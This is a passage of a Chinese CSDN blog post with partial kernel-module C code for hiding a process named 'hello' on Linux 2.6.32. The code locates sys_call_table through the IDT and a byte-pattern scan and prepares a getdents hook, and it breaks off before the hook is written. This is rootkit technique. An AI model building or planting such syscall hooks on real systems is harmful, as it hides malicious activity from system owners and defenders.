Linux隐藏进程

在不修改内核源码的情况下,通过劫持系统调用和Linux可卸载模块编程,实现隐藏进程的技术。示例程序包含在makefile中,用于编译和清理。参考了多个关于Linux高级隐藏技术和系统调用劫持的文章。
摘要由CSDN通过智能技术生成

系统信息:内核为2.6.32 CentOSX86_64

由于不能修改内核源码,故需要引入劫持系统调用技术、Linux可卸载模块编程技术

示例程序

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <asm/unistd.h>
#include <linux/dirent.h>
#include <linux/stat.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>
#define CALLOFF 100

//define idtr and idt struct
//隐藏进程名为:hello

char psname[10] = "hello";
char *processname = psname;

struct{
    unsigned short limit;
    unsigned int base;
}__attribute__((packed))idtr;

struct{
    unsigned short off_low;
    unsigned short sel;
    unsigned char none;
    unsigned char flags;
    unsigned short off_high;
}__attribute__((packed))*idt;

struct _idt
{
    unsigned short offset_low,segment_sel;
    unsigned char reserved,flags;
    unsigned short offset_high;
};

/*unsigned long *getscTable()
{
    unsigned char idtr[6] = {0}, *shell = NULL, *sort = NULL;
    struct _idt *idtLong = NULL;
    unsigned long system_call = 0, sct = 0;
    unsigned short offset_low = 0, offset_high = 0;
    char *p = NULL;
    int i = 0;

    __asm__("sidt %0" : "=m" (idtr));

    idtLong=(struct _idt*)(*(unsigned long*)&idtr[2]+8*0x80);
    offset_low = idtLong->offset_low;
    offset_high = idtLong->offset_high;
    system_call = (offset_high<<16)|offset_low;

    shell=(char *)system_call;
    sort="\xff\x14\x85";

    for(i=0;i<(100-2);i++)
    {
        if(shell[i] == sort[0] && shell[i+1] == sort[1] && shell[i+2] == sort[2])
	{
	    break;
	}
    }

    p = &shell[i];
    p += 3;

    sct=*(unsigned long*)p;
    return (unsigned long*)(sct);
}*/

//define function, Point to the system being hijacked

struct linux_dirent
{
    unsigned long     d_ino;
    unsigned long     d_off;
    unsigned short    d_reclen;
    char    d_name[1];
};

asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent __user *dirp, unsigned int count);

//int orig_cr0 = 0;
unsigned long *sys_call_table = NULL;

//get function system_call addr

/*void* get_system_call(void)
{
    printk(KERN_ALERT "start get_system_call...\n");
    void * addr = NULL;
    asm("sidt %0":"=m"(idtr));
    idt = (void*) ((unsigned long*)idtr.base);
    addr = (void*) (((unsigned int)idt[0x80].off_low) | (((unsigned int)idt[0x80].off_high)<<16 ));
    return addr;
}*/

//find sys_call_table

char* fin
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值